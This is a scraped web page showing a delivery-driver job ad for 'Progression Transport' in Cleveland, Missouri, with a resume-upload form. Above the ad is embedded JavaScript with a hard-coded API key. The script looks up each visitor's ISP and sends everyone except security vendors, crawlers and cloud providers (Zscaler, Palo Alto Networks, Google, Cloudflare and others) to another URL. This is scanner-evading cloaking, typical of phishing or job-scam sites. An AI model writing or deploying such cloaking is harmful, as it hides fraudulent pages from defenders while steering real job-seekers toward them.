Delivery Driver

Delivery Driver

Overview


const ipAddress = data.ip;

// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;

// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));

if (!ispAllowed && !asOrgAllowed) { // Redirect all users to the same URL window.location.href = ''; } }) .catch(error => { console.error('Error retrieving ISP name:', error); }); }) .catch(error => { console.error('Error retrieving IP address or location:', error); });

Join our team as a Delivery Driver - Earn Extra Cash in Cleveland, Missouri!
Enjoy flexible hours and the opportunity to earn additional income by delivering packages and food orders within your local area.

Responsibilities include:

  • Safely operate a vehicle to deliver orders promptly and accurately
  • Maintain a clean driving record and adhere to traffic laws
  • Communicate effectively with customers to ensure a positive experience
  • Handle deliveries with care, ensuring items are delivered in excellent condition
  • Use a mobile device or GPS for navigation and delivery updates

Skills needed:

  • Valid driver’s license and reliable transportation
  • Good time management and organization skills
  • Strong customer service orientation
  • Ability to work independently and safely

Benefits include:

  • Flexible scheduling to fit your lifestyle
  • Extra income opportunities
  • Supportive team environment
  • Potential for tips and bonuses
Emploment Location
Cleveland, Missouri

Apply to Join Progression Transport.

*
*
* Attach your resume. Max size 2mb Allowed Types: pdf